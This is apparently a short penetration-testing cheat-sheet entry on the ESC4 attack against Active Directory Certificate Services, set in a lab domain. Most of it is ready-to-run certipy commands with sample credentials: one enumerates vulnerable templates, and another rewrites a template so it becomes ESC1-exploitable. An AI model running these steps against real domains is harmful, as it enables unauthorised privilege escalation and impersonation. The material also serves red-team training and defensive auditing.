ESC4
The attack is possible if the compromised users/computers have modifiable permissions (Write*, FullControl, and etc.) over a certificate template. For instance, lets say you have compromised a user called certsvc and it has FullControl permission over a certificate template MachineV2. This allows certsvc to modify cert template configuration to make it vulnerable to ESC1.
- The certificate configuration can be enumerated with certipy
certipy find -u certsvc@range.local -p Password1234 -dc-ip 10.10.10.10 -stdout -vulnerable -enabledNote
-enabledflag will only shows the enabled template which is useful in our case to avoid templates that are not usable-vulnerableflag will only shows templates that are detected to be vulnerable but this is not recommended because it might produce a false positive result-stdoutflag will just print the output to stdout instead of a file. To generate a bloodhound-compatible result, you may use-bloodhoundflag.
- Proceed with ESC4 exploit by changing the template configurations.
| Attribute | Value |
|---|---|
msPKI-Certificate-Name-Flag | (0x1) ENROLLEE_SUPPLIES_SUBJECT |
ManageApproval | false |
certipy template -dc-ip 10.10.10.10 -u certsvc@range.local -p 'f@rdanojano' -template MachineV2 -target CA.range.local -save-old- Now the certificate is vulnerable to ESC1